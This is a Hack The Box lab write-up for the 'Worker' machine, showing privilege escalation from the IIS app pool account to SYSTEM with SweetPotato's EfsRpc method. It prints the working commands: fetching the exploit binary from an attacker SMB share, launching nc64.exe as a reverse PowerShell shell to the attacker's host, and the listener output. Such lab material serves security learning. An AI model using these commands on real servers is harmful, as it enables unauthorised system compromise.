InfoSec LAB

Worker_Privilege_Escalation_3

Created: 2 min read

SweetPotato

The compromised iis apppool\defaultapppool account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. this makes the target system vulnerable to the potato exploits

I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 & Windows Server 2019 the target system is windows server 2019, so i will be using an alternative; sweetpotato

sweetpotato is a collection of various native windows privilege escalation techniques from service accounts to system. it has been created by @ethicalchaos and includes:

  •     RottenPotato
  •     Weaponized JuciyPotato with BITS WinRM discovery
  •     PrintSpoofer discovery and original exploit
  •     EfsRpc built on EfsPotato
  •     PetitPotam

exploit

Exploit binary is available online

PS C:\tmp> copy \\10.10.16.8\smb\potato\SweetPotato.exe .

Delivery complete

Exploitation

ps c:\tmp> cmd /c C:\tmp\SweetPotato.exe -p "C:\tmp\nc64.exe" -e EfsRpc -a "10.10.16.8 1235 -e powershell"
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] attempting np impersonation using method efsrpc to launch c:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/325b0bde-18b2-4b9d-960b-03c614e69956/\325b0bde-18b2-4b9d-960b-03c614e69956\325b0bde-18b2-4b9d-960b-03c614e69956
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

The command above uses the EFSRPC method, which targets the MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege Additionally, this method doesn’t even require tunneling to evade the active firewall

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 1235  
listening on [any] 1235 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 51061
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
ps c:\Windows\system32> whoami
whoami
nt authority\system
ps c:\Windows\system32> hostname
hostname
Worker
ps c:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::248
   ipv6 address. . . . . . . . . . . : dead:beef::1cb0:fbca:343f:d725
   link-local ipv6 address . . . . . : fe80::1cb0:fbca:343f:d725%4
   ipv4 address. . . . . . . . . . . : 10.10.10.203
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks